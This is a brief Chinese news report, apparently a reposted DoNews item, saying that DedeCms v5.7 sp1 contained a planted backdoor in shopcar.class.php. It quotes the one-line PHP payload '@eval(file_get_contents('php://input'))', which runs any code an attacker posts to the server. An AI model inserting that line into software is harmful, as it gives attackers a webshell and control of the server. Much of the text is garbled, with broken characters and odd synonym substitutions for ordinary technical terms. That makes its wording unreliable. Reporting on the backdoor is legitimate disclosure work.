DoNews 3月22日動(dòng)靜 據(jù)動(dòng)靜人士對(duì)DoNews透露，PHP開源網(wǎng)站打點(diǎn)系統(tǒng)織夢(mèng)CMS（DedeCms）v5.7 sp1版本被植入后門，黑客可經(jīng)由過(guò)程此后門直接獲得網(wǎng)站的節(jié)制權(quán)限，獲取存儲(chǔ)在處事器尚?罾υ?件和數(shù)據(jù)庫(kù)。

　　據(jù)悉，織夢(mèng)CMS（Dedecms）v5.7 sp1版本的中的shopcar。class。php文件被植入一句后門代碼“＠eval（file＿get＿contents（‘php：／／input’））；”。經(jīng)由過(guò)程操作該后門，黑客只需機(jī)關(guān)簡(jiǎn)單的數(shù)據(jù)包提交各處事器，就能獲取到該網(wǎng)站的WebShell，經(jīng)由過(guò)程對(duì)處事器進(jìn)一步滲入抨擊襲擊，進(jìn)而獲取處事器的最高權(quán)限。

織夢(mèng)CMS裂痕示意圖

　　另?yè)?jù)CMS官方數(shù)據(jù)顯示，今朝約有70萬(wàn)網(wǎng)站使用該系統(tǒng)搭建，涉及企業(yè)、政府機(jī)關(guān)、媒體機(jī)構(gòu)、行業(yè)及小我網(wǎng)站等。（完）